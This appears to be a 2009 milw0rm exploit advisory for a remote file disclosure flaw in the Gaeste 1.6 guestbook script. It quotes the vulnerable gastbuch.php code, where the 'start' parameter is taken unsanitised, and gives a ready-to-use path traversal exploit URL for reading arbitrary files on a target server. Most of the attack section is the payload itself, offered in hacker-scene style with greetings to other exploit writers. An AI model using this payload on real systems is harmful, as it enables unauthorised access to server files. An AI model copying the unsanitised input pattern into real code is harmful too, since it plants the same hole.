34 lines
No EOL
1.1 KiB
Text
34 lines
No EOL
1.1 KiB
Text
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
+ +
|
|
+ Gaeste 1.6 (gastbuch.php) Remote File Disclosure Vulnerability +
|
|
+ +
|
|
+ bd0rk || SOH-Crew +
|
|
+ +
|
|
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
|
|
|
|
=> Vendor: http://www.php4scripte.de/
|
|
|
|
=> Download: http://www.php4scripte.de/download/gastbuchxhtml16.zip
|
|
|
|
=> Bugfound3R: bd0rk
|
|
|
|
=> Greetz: str0ke, TheJT, TheAJ, kretzi, DarkFig, Perforin ;-)
|
|
|
|
=> Vulnerable Code in gastbuch.php line 2-3
|
|
|
|
-------------------------------
|
|
|
|
if (isset($_GET['start'])) {
|
|
$start=$_GET['start'];
|
|
|
|
-------------------------------
|
|
|
|
|
|
[+]XPL0iT: http://[t4rg3t]/[gaestepath]/gastbuch.php?start=../../TARGETFILE.php
|
|
|
|
|
|
###The 20 years old, german Hacker bd0rk###
|
|
|
|
# milw0rm.com [2009-02-09] |